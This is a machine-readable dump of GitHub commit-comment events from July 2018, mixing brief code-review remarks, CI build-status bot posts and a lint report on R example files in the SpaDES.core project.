{"id":"8027601187","type":"CommitCommentEvent","actor":{"login":"vincentfretin"},"repo":{"name":"assembl/assembl"},"payload":{"comment":{"id":29856273,"position":61,"line":679,"path":"assembl/models/auth.py","commit_id":"60bb78e195a58b55ddcdcf8674d91fe680869e68","created_at":"2018-07-27T09:39:14Z","updated_at":"2018-07-27T09:39:14Z","author_association":"CONTRIBUTOR","body":"use `c.name` instead of `c._value_`"}},"created_at":"2018-07-27T09:39:14Z"}
{"id":"8027601715","type":"CommitCommentEvent","actor":{"login":"anang-warpin"},"repo":{"name":"odoo/odoo"},"payload":{"comment":{"id":29856278,"position":14,"line":596,"path":"addons/stock/models/product.py","commit_id":"850bb6cae4d10d452ca59f834190585bf3e4f0de","created_at":"2018-07-27T09:39:21Z","updated_at":"2018-07-27T09:39:21Z","author_association":"NONE","body":"why only search cancel state?\r\nwhy didn't search with done state too?"}},"created_at":"2018-07-27T09:39:21Z"}
{"id":"8027608175","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29856287,"position":null,"line":null,"path":null,"commit_id":"9655ee264b3c2db52e7cf57fe0d73e331d2e9461","created_at":"2018-07-27T09:40:39Z","updated_at":"2018-07-27T09:40:39Z","author_association":"NONE","body":"develop (Myoldmopar) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-9655ee264b3c2db52e7cf57fe0d73e331d2e9461-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a>  \n"}},"created_at":"2018-07-27T09:40:39Z"}
{"id":"8027609658","type":"CommitCommentEvent","actor":{"login":"jserv"},"repo":{"name":"ajblane/dcurl"},"payload":{"comment":{"id":29856288,"position":45,"line":89,"path":"README.md","commit_id":"68545aec347a05ce519bbfe73fa3e11a59212557","created_at":"2018-07-27T09:40:58Z","updated_at":"2018-07-27T09:40:58Z","author_association":"NONE","body":"Just skip kernel messages. We only have to list the messages generated by `dcurl`."}},"created_at":"2018-07-27T09:40:58Z"}
{"id":"8027610920","type":"CommitCommentEvent","actor":{"login":"x1n3f"},"repo":{"name":"x1n3f/OrganizerBagaznika"},"payload":{"comment":{"id":29856290,"position":null,"line":null,"path":null,"commit_id":"c5682caa4633101ba09499c297869e3800aad539","created_at":"2018-07-27T09:41:13Z","updated_at":"2018-07-27T09:41:13Z","author_association":"OWNER","body":"ERROR!:\r\n\r\nnot getPosX(), but getDimX()!!!"}},"created_at":"2018-07-27T09:41:13Z"}
{"id":"8027614216","type":"CommitCommentEvent","actor":{"login":"EpicSquid"},"repo":{"name":"SleepyTrousers/EnderIO"},"payload":{"comment":{"id":29856296,"position":5,"line":217,"path":"enderio-base/src/main/java/crazypants/enderio/base/config/Config.java","commit_id":"58124998c69cda15e60fa76c9a35ae458f68ea33","created_at":"2018-07-27T09:41:54Z","updated_at":"2018-07-27T09:41:54Z","author_association":"MEMBER","body":"Thats not supposed to be there.. Oops"}},"created_at":"2018-07-27T09:41:54Z"}
{"id":"8027617434","type":"CommitCommentEvent","actor":{"login":"davidanger"},"repo":{"name":"davidanger/libsigrokdecode"},"payload":{"comment":{"id":29856304,"position":null,"line":null,"path":null,"commit_id":"f44eebddb4667afe0f6602f821de98c6c50fb5b6","created_at":"2018-07-27T09:42:34Z","updated_at":"2018-07-27T09:42:34Z","author_association":"OWNER","body":"#1 Fixed this Issure"}},"created_at":"2018-07-27T09:42:34Z"}
{"id":"8027621177","type":"CommitCommentEvent","actor":{"login":"jiangyougan"},"repo":{"name":"jiangyougan/spring-cloud"},"payload":{"comment":{"id":29856310,"position":null,"line":null,"path":null,"commit_id":"56dc2bce530771512d9552bba60124a8d3373dbd","created_at":"2018-07-27T09:43:19Z","updated_at":"2018-07-27T09:43:19Z","author_association":"OWNER","body":"6666"}},"created_at":"2018-07-27T09:43:19Z"}
{"id":"8027630992","type":"CommitCommentEvent","actor":{"login":"rwakulszowa"},"repo":{"name":"kxkaro/Skater_pygame"},"payload":{"comment":{"id":29856327,"position":63,"line":38,"path":"skater/obstacles.py","commit_id":"f3cfdb85181baba0bf9552cd11f7db95252fae01","created_at":"2018-07-27T09:45:20Z","updated_at":"2018-07-27T09:45:20Z","author_association":"CONTRIBUTOR","body":"Teraz jeśli coś nie będzie działało z wykrywaniem kolizji, można debugować przez napisanie testu zamiast szukania problemu ręcznie (w większych projektach testy są bardzo przydatne w debugowaniu).\r\n\r\nSwoją drogą, funkcje `is_colliding*` są używane trochę inaczej niż `is_under` -> np. `is_colliding_left` zwróci `True` jeśli `self` jest pod `other_rect`, chociaż nie powinno."}},"created_at":"2018-07-27T09:45:20Z"}
{"id":"8027637339","type":"CommitCommentEvent","actor":{"login":"Braendle"},"repo":{"name":"pyqtgraph/pyqtgraph"},"payload":{"comment":{"id":29856343,"position":32,"line":1136,"path":"pyqtgraph/graphicsItems/ViewBox/ViewBox.py","commit_id":"585390e16ebbc7eb993c78216cc88e439c5bfe60","created_at":"2018-07-27T09:46:39Z","updated_at":"2018-07-27T09:46:39Z","author_association":"NONE","body":"Removed accidentally?"}},"created_at":"2018-07-27T09:46:39Z"}
{"id":"8027642389","type":"CommitCommentEvent","actor":{"login":"jims10d"},"repo":{"name":"jims10d/sportman-loopback"},"payload":{"comment":{"id":29856352,"position":null,"line":null,"path":null,"commit_id":"3a5af8f05c33c9960fc50c369c021d5f5e13f6d2","created_at":"2018-07-27T09:47:42Z","updated_at":"2018-07-27T09:47:42Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.ng.bluemix.net/devops/toolchains/5a7e57bc-5410-437d-95a5-d427815f5ebc?env_id=ibm%3Ayp%3Aus-south \"sportman-loopback\"): [Delivery Pipeline](https://console.ng.bluemix.net/devops/pipelines/db4be768-68e6-447f-9187-7d1ee9f620cc?env_id=ibm%3Ayp%3Aus-south \"sportman-loopback\") deployed [sportman-loopback](https://github.com/jims10d/sportman-loopback/releases/tag/deploy-ibm-yp-us-south-jims10d-simpleSpace-20180727-094741 \"deploy-ibm-yp-us-south-jims10d-simpleSpace-20180727-094741\") to [simpleSpace](https://console.bluemix.net/apps/12384bdb-7ac1-45d2-b63b-7d0a3532c568?env_id=ibm:yp:us-south \"ibm:yp:us-south:jims10d:simpleSpace\"), including this commit"}},"created_at":"2018-07-27T09:47:42Z"}
{"id":"8027644555","type":"CommitCommentEvent","actor":{"login":"jana-rapava"},"repo":{"name":"EldoreiJK/fty-common"},"payload":{"comment":{"id":29856354,"position":16,"line":54,"path":".travis.yml","commit_id":"368f80b89bd41a8b470417cc78efcc6ea11913b1","created_at":"2018-07-27T09:48:09Z","updated_at":"2018-07-27T09:48:09Z","author_association":"NONE","body":"CMake should stay commented out"}},"created_at":"2018-07-27T09:48:09Z"}
{"id":"8027652764","type":"CommitCommentEvent","actor":{"login":"NilanthAnimosus"},"repo":{"name":"Regalis11/Barotrauma"},"payload":{"comment":{"id":29856374,"position":null,"line":null,"path":null,"commit_id":"aa5b2a973e3cc4657a231cb6ac633579c8acf03d","created_at":"2018-07-27T09:49:49Z","updated_at":"2018-07-27T09:49:49Z","author_association":"CONTRIBUTOR","body":"Although interesting in theory and i'm not sure where this is going, it is worth pointing out from issue #273 that mirroring submarines repeatedly causes items to shift by very tiny amounts, eventually \"collapsing\" the submarine in on itself (From this picture included in that issue)\r\n\r\nJust in case you are thinking of mirroring the submarines themselves - It may actually cause problems without that issue being solved (Maybe that needs its own issue report? It isn't strictly an issue as the function FlipX isn't really used repeatedly anywhere, only once in combat missions in a none-saved fashion).\r\n\r\nIncluding the images for the flipX issues:\r\n\r\nOriginal submarine:\r\n![image](https://i.imgur.com/ukJxElX.png)\r\n\r\nFlipped repeatedly:\r\n![image](https://puu.sh/zpJ9i/3b72b1a816.jpg)"}},"created_at":"2018-07-27T09:49:49Z"}
{"id":"8027653537","type":"CommitCommentEvent","actor":{"login":"jana-rapava"},"repo":{"name":"EldoreiJK/fty-common"},"payload":{"comment":{"id":29856375,"position":41,"line":77,"path":".travis.yml","commit_id":"368f80b89bd41a8b470417cc78efcc6ea11913b1","created_at":"2018-07-27T09:49:59Z","updated_at":"2018-07-27T09:49:59Z","author_association":"NONE","body":"I think this line should be commented out to download our fork of log4cplus "}},"created_at":"2018-07-27T09:49:59Z"}
{"id":"8027655998","type":"CommitCommentEvent","actor":{"login":"xinyuyangiloveyou"},"repo":{"name":"shijieshangzuimeidenvren/shijieshangzuimeidenvren.github.io"},"payload":{"comment":{"id":29856385,"position":null,"line":null,"path":null,"commit_id":"be51990cf1d934ad0f8a4c832c6afd9ee32cb085","created_at":"2018-07-27T09:50:27Z","updated_at":"2018-07-27T09:50:27Z","author_association":"NONE","body":"xinyuyangiloveyou.github.io"}},"created_at":"2018-07-27T09:50:27Z"}
{"id":"8027659380","type":"CommitCommentEvent","actor":{"login":"mathe30"},"repo":{"name":"mathe30/c_repo"},"payload":{"comment":{"id":29856390,"position":4,"line":30,"path":"cstring.c","commit_id":"7af492e8d2fcc78973ab66a7ec990f3bb09a2260","created_at":"2018-07-27T09:51:09Z","updated_at":"2018-07-27T09:51:09Z","author_association":"OWNER","body":"ig yeah , it was useless "}},"created_at":"2018-07-27T09:51:09Z"}
{"id":"8027666616","type":"CommitCommentEvent","actor":{"login":"Xc1d30us-Mercy"},"repo":{"name":"Xc1d30us-Mercy/rpg-dice"},"payload":{"comment":{"id":29856400,"position":null,"line":null,"path":null,"commit_id":"4e1ff9fc5c2e754e8da9bdbebd5ac9727ea29931","created_at":"2018-07-27T09:52:39Z","updated_at":"2018-07-27T09:52:39Z","author_association":"OWNER","body":"Keeping here but separating the pieces into separate classes on my hub\r\n"}},"created_at":"2018-07-27T09:52:39Z"}
{"id":"8027671078","type":"CommitCommentEvent","actor":{"login":"edo9300"},"repo":{"name":"Fluorohydride/ygopro-core"},"payload":{"comment":{"id":29856411,"position":null,"line":null,"path":null,"commit_id":"5a2958c64e392cc83536d5f835b264abfbe4afbe","created_at":"2018-07-27T09:53:35Z","updated_at":"2018-07-27T09:53:35Z","author_association":"CONTRIBUTOR","body":"Why was it removed?"}},"created_at":"2018-07-27T09:53:35Z"}
{"id":"8027671164","type":"CommitCommentEvent","actor":{"login":"jana-rapava"},"repo":{"name":"EldoreiJK/fty-common"},"payload":{"comment":{"id":29856412,"position":41,"line":77,"path":".travis.yml","commit_id":"368f80b89bd41a8b470417cc78efcc6ea11913b1","created_at":"2018-07-27T09:53:37Z","updated_at":"2018-07-27T09:53:37Z","author_association":"NONE","body":"this should stay commented out to download our fork of log4cplus"}},"created_at":"2018-07-27T09:53:37Z"}
{"id":"8027672274","type":"CommitCommentEvent","actor":{"login":"Priyankasaggu11929"},"repo":{"name":"Priyankasaggu11929/Smaple-project"},"payload":{"comment":{"id":29856414,"position":2,"line":2,"path":"Second-File.txt","commit_id":"6cfb6da92d5aa25b9d3123606664dcea54eadce6","created_at":"2018-07-27T09:53:51Z","updated_at":"2018-07-27T09:53:51Z","author_association":"OWNER","body":"Tyoe some more lines of code.\r\n\r\n- "}},"created_at":"2018-07-27T09:53:51Z"}
{"id":"8027679290","type":"CommitCommentEvent","actor":{"login":"jonnyshaw89"},"repo":{"name":"ONSdigital/eq-survey-runner"},"payload":{"comment":{"id":29856546,"position":4,"line":372,"path":"app/views/questionnaire.py","commit_id":"80920a80caf634bab0c81e98f366b22a02d2b7b9","created_at":"2018-07-27T09:55:16Z","updated_at":"2018-07-27T09:55:16Z","author_association":"MEMBER","body":"wooo deleting code 👍 "}},"created_at":"2018-07-27T09:55:16Z"}
{"id":"8027682468","type":"CommitCommentEvent","actor":{"login":"lotchi"},"repo":{"name":"lotchi/association"},"payload":{"comment":{"id":29856551,"position":null,"line":null,"path":null,"commit_id":"fe6647a8b283aaa7e34dc910bbf6a52fcd0a4164","created_at":"2018-07-27T09:55:55Z","updated_at":"2018-07-27T09:55:55Z","author_association":"OWNER","body":"\r\nddd\r\n"}},"created_at":"2018-07-27T09:55:55Z"}
{"id":"8027691218","type":"CommitCommentEvent","actor":{"login":"Regalis11"},"repo":{"name":"Regalis11/Barotrauma"},"payload":{"comment":{"id":29856559,"position":null,"line":null,"path":null,"commit_id":"aa5b2a973e3cc4657a231cb6ac633579c8acf03d","created_at":"2018-07-27T09:57:44Z","updated_at":"2018-07-27T09:57:44Z","author_association":"OWNER","body":"The intention is to simply mirror the level when you're passing through it \"the wrong way\" (i.e. to fix #519), so the submarine flipping issue will not affect this in any way."}},"created_at":"2018-07-27T09:57:44Z"}
{"id":"8027697447","type":"CommitCommentEvent","actor":{"login":"Aviator-Coding"},"repo":{"name":"Aviator-Coding/ips-explorer-translation"},"payload":{"comment":{"id":29856573,"position":null,"line":null,"path":null,"commit_id":"cb99730dbcd81f820e8b7cedd6187cd90fd7befc","created_at":"2018-07-27T09:59:03Z","updated_at":"2018-07-27T09:59:03Z","author_association":"OWNER","body":"Thanks"}},"created_at":"2018-07-27T09:59:03Z"}
{"id":"8031296137","type":"CommitCommentEvent","actor":{"login":"isaiasalves"},"repo":{"name":"beatrizmayumi/sistema_matriculas"},"payload":{"comment":{"id":29865203,"position":null,"line":null,"path":null,"commit_id":"795238da14fa04e9c14c2bbd7f266f8868e77718","created_at":"2018-07-28T00:01:26Z","updated_at":"2018-07-28T00:01:26Z","author_association":"COLLABORATOR","body":"Arquivo CSV com ofertas de disciplinas de algum quadrimestre de 2014 que podemos utilizar como exemplo.\r\nO arquivo possui apenas as disciplinas de BC&T e BCC"}},"created_at":"2018-07-28T00:01:26Z"}
{"id":"8031305707","type":"CommitCommentEvent","actor":{"login":"manterolat"},"repo":{"name":"JTLascha/PythonCityGame"},"payload":{"comment":{"id":29865218,"position":null,"line":null,"path":null,"commit_id":"c9d571995ded6e79378e48513ced11618472c219","created_at":"2018-07-28T00:06:19Z","updated_at":"2018-07-28T00:06:19Z","author_association":"COLLABORATOR","body":"Make sure your editor is set to 4 spaces and not tabs. Otherwise Python will complain and the game won't run."}},"created_at":"2018-07-28T00:06:19Z"}
{"id":"8031309112","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29865227,"position":null,"line":null,"path":null,"commit_id":"5d31b27e3e6c518f2ce9a6e44527e3a246fb14c3","created_at":"2018-07-28T00:08:13Z","updated_at":"2018-07-28T00:08:13Z","author_association":"NONE","body":"Myoldmopar-patch-1 (Myoldmopar) - x86_64-Linux-Ubuntu-14.04-gcc-4.8: OK (2988 of 2988 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-5d31b27e3e6c518f2ce9a6e44527e3a246fb14c3-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-5d31b27e3e6c518f2ce9a6e44527e3a246fb14c3-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-28T00:08:13Z"}
{"id":"8031310703","type":"CommitCommentEvent","actor":{"login":"josh-chou"},"repo":{"name":"SFDigitalServices/sfgov"},"payload":{"comment":{"id":29865230,"position":null,"line":null,"path":null,"commit_id":"2eb90f60533747d17f55909980296785b03cb0d9","created_at":"2018-07-28T00:09:07Z","updated_at":"2018-07-28T00:09:07Z","author_association":"COLLABORATOR","body":"Created multidev environment [sfgov#ci-1025](https://dashboard.pantheon.io/sites/91d50373-c4cf-40e4-a646-cb73e16a140c#ci-1025).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-1025-sfgov.pantheonsite.io/)"}},"created_at":"2018-07-28T00:09:07Z"}
{"id":"8031313909","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29865236,"position":null,"line":null,"path":null,"commit_id":"d26e48bf0524cbfdb192d6c154200625d7127141","created_at":"2018-07-28T00:10:59Z","updated_at":"2018-07-28T00:10:59Z","author_association":"NONE","body":"issue-6790-VRP-D-term (mjwitte) - i386-Windows-7-VisualStudio-14: OK (2948 of 2948 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-d26e48bf0524cbfdb192d6c154200625d7127141-i386-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-d26e48bf0524cbfdb192d6c154200625d7127141-i386-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-28T00:10:59Z"}
{"id":"8031313953","type":"CommitCommentEvent","actor":{"login":"lintr-bot"},"repo":{"name":"PredictiveEcology/SpaDES.core"},"payload":{"comment":{"id":29865237,"position":null,"line":null,"path":null,"commit_id":"cb0e48dba7565ad522e2ab9c619b90744486fddf","created_at":"2018-07-28T00:11:00Z","updated_at":"2018-07-28T00:11:00Z","author_association":"NONE","body":"[inst/examples/example_experiment.R:91:5:](https://github.com/PredictiveEcology/SpaDES.core/blob/cb0e48dba7565ad522e2ab9c619b90744486fddf/inst/examples/example_experiment.R#L91) *style:* **Commented code should be removed.**\n```r\n​  # library(raster)\n    ^~~~~~~~~~~~~~~\n```\n[inst/examples/example_experiment.R:92:5:](https://github.com/PredictiveEcology/SpaDES.core/blob/cb0e48dba7565ad522e2ab9c619b90744486fddf/inst/examples/example_experiment.R#L92) *style:* **Commented code should be removed.**\n```r\n​  # beginCluster(20) # if you have multiple clusters available, use them here to save time\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/examples/example_experiment.R:96:5:](https://github.com/PredictiveEcology/SpaDES.core/blob/cb0e48dba7565ad522e2ab9c619b90744486fddf/inst/examples/example_experiment.R#L96) *style:* **Commented code should be removed.**\n```r\n​  # endCluster() # end the clusters\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/examples/example_experiment.R:152:5:](https://github.com/PredictiveEcology/SpaDES.core/blob/cb0e48dba7565ad522e2ab9c619b90744486fddf/inst/examples/example_experiment.R#L152) *style:* **Commented code should be removed.**\n```r\n​  # fires <- lapply(sims, function(x) x$landscape$fires) %>% stack\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/examples/example_POM.R:49:5:](https://github.com/PredictiveEcology/SpaDES.core/blob/cb0e48dba7565ad522e2ab9c619b90744486fddf/inst/examples/example_POM.R#L49) *style:* **Commented code should be removed.**\n```r\n​  # cl <- makeCluster(detectCores() - 1) # not implemented yet in DEoptim\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/examples/example_POM.R:84:4:](https://github.com/PredictiveEcology/SpaDES.core/blob/cb0e48dba7565ad522e2ab9c619b90744486fddf/inst/examples/example_POM.R#L84) *style:* **Commented code should be removed.**\n```r\n​  #stopCluster(cl) # not yet implemented, waiting for DEoptim\n   ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/examples/example_POM.R:107:34:](https://github.com/PredictiveEcology/SpaDES.core/blob/cb0e48dba7565ad522e2ab9c619b90744486fddf/inst/examples/example_POM.R#L107) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​    params(sim1)$caribouMovement$N <- pars[2]\n                                 ^\n```\n[inst/examples/example_POM.R:114:5:](https://github.com/PredictiveEcology/SpaDES.core/blob/cb0e48dba7565ad522e2ab9c619b90744486fddf/inst/examples/example_POM.R#L114) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​    nPattern_Out <- caribouFn(out$caribou)\n    ^~~~~~~~~~~~\n```\n[inst/examples/example_POM.R:120:7:](https://github.com/PredictiveEcology/SpaDES.core/blob/cb0e48dba7565ad522e2ab9c619b90744486fddf/inst/examples/example_POM.R#L120) *style:* **Commented code should be removed.**\n```r\n​    # cat(minimizeFn)\n      ^~~~~~~~~~~~~~~\n```\n[inst/examples/example_POM.R:121:7:](https://github.com/PredictiveEcology/SpaDES.core/blob/cb0e48dba7565ad522e2ab9c619b90744486fddf/inst/examples/example_POM.R#L121) *style:* **Commented code should be removed.**\n```r\n​    # cat(\" \")\n      ^~~~~~~~\n```\n[inst/examples/example_POM.R:122:7:](https://github.com/PredictiveEcology/SpaDES.core/blob/cb0e48dba7565ad522e2ab9c619b90744486fddf/inst/examples/example_POM.R#L122) *style:* **Commented code should be removed.**\n```r\n​    # cat(pars)\n      ^~~~~~~~~\n```\n[inst/examples/example_POM.R:123:7:](https://github.com/PredictiveEcology/SpaDES.core/blob/cb0e48dba7565ad522e2ab9c619b90744486fddf/inst/examples/example_POM.R#L123) *style:* **Commented code should be removed.**\n```r\n​    # cat(\"\\n\")\n      ^~~~~~~~~\n```\n[inst/sampleModules/caribouMovement/caribouMovement.R:1:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/cb0e48dba7565ad522e2ab9c619b90744486fddf/inst/sampleModules/caribouMovement/caribouMovement.R#L1) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​SpaDES.core.version <- \"0.1.0\"\n^~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/caribouMovement/caribouMovement.R:54:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/cb0e48dba7565ad522e2ab9c619b90744486fddf/inst/sampleModules/caribouMovement/caribouMovement.R#L54) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​doEvent.caribouMovement <- function(sim, eventTime, eventType, debug = FALSE) {\n^~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/caribouMovement/caribouMovement.R:86:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/cb0e48dba7565ad522e2ab9c619b90744486fddf/inst/sampleModules/caribouMovement/caribouMovement.R#L86) *style:* **Lines should not be more than 100 characters.**\n```r\n​      sim <- scheduleEvent(sim, time(sim) + P(sim)$.plotInterval, \"caribouMovement\", \"plot\", .last())\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/caribouMovement/caribouMovement.R:95:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/cb0e48dba7565ad522e2ab9c619b90744486fddf/inst/sampleModules/caribouMovement/caribouMovement.R#L95) *style:* **Lines should not be more than 100 characters.**\n```r\n​      sim <- scheduleEvent(sim, time(sim) + P(sim)$.plotInterval, \"caribouMovement\", \"plot\", .last())\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/caribouMovement/caribouMovement.R:102:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/cb0e48dba7565ad522e2ab9c619b90744486fddf/inst/sampleModules/caribouMovement/caribouMovement.R#L102) *style:* **Lines should not be more than 100 characters.**\n```r\n​      sim <- scheduleEvent(sim, time(sim) + P(sim)$.saveInterval, \"caribouMovement\", \"save\", .last() + 1)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/caribouMovement/caribouMovement.R:114:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/cb0e48dba7565ad522e2ab9c619b90744486fddf/inst/sampleModules/caribouMovement/caribouMovement.R#L114) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​Init <- function(sim) {\n^~~~\n```\n[inst/sampleModules/caribouMovement/caribouMovement.R:121:3:](https://github.com/PredictiveEcology/SpaDES.core/blob/cb0e48dba7565ad522e2ab9c619b90744486fddf/inst/sampleModules/caribouMovement/caribouMovement.R#L121) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  N <- P(sim)$N\n  ^\n```\n[inst/sampleModules/caribouMovement/caribouMovement.R:122:3:](https://github.com/PredictiveEcology/SpaDES.core/blob/cb0e48dba7565ad522e2ab9c619b90744486fddf/inst/sampleModules/caribouMovement/caribouMovement.R#L122) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  IDs <- as.character(1:N)\n  ^~~\n```\n[inst/sampleModules/caribouMovement/caribouMovement.R:138:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/cb0e48dba7565ad522e2ab9c619b90744486fddf/inst/sampleModules/caribouMovement/caribouMovement.R#L138) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​Move <- function(sim) {\n^~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:1:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/cb0e48dba7565ad522e2ab9c619b90744486fddf/inst/sampleModules/fireSpread/fireSpread.R#L1) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​SpaDES.core.version <- \"0.1.0\"\n^~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:20:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/cb0e48dba7565ad522e2ab9c619b90744486fddf/inst/sampleModules/fireSpread/fireSpread.R#L20) *style:* **Lines should not be more than 100 characters.**\n```r\n​    person(c(\"Alex\", \"M\"), \"Chubaty\", email = \"alexander.chubaty@canada.ca\", role = c(\"aut\", \"cre\")),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:21:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/cb0e48dba7565ad522e2ab9c619b90744486fddf/inst/sampleModules/fireSpread/fireSpread.R#L21) *style:* **Lines should not be more than 100 characters.**\n```r\n​    person(c(\"Eliot\", \"J\", \"B\"), \"McIntire\", email = \"eliot.mcintire@canada.ca\", role = c(\"aut\", \"cre\")),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:35:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/cb0e48dba7565ad522e2ab9c619b90744486fddf/inst/sampleModules/fireSpread/fireSpread.R#L35) *style:* **Lines should not be more than 100 characters.**\n```r\n​    defineParameter(\"persistprob\", \"numeric\", 0.00, 0, 1, \"probability of fire persisting in a pixel\"),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:37:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/cb0e48dba7565ad522e2ab9c619b90744486fddf/inst/sampleModules/fireSpread/fireSpread.R#L37) *style:* **Lines should not be more than 100 characters.**\n```r\n​    defineParameter(\"spreadprob\", \"numeric\", 0.225, 0.05, 0.5, \"probability of fire spreading into a pixel\"),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:38:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/cb0e48dba7565ad522e2ab9c619b90744486fddf/inst/sampleModules/fireSpread/fireSpread.R#L38) *style:* **Lines should not be more than 100 characters.**\n```r\n​    defineParameter(\"startTime\", \"numeric\", start(sim) + 1, 0, end(sim), \"time of initial fire ignition\"),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:39:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/cb0e48dba7565ad522e2ab9c619b90744486fddf/inst/sampleModules/fireSpread/fireSpread.R#L39) *style:* **Lines should not be more than 100 characters.**\n```r\n​    defineParameter(\".plotInitialTime\", \"numeric\", start(sim), start(sim), end(sim) + 1, \"time to schedule first plot event\"),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:41:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/cb0e48dba7565ad522e2ab9c619b90744486fddf/inst/sampleModules/fireSpread/fireSpread.R#L41) *style:* **Lines should not be more than 100 characters.**\n```r\n​    defineParameter(\".saveInitialTime\", \"numeric\", 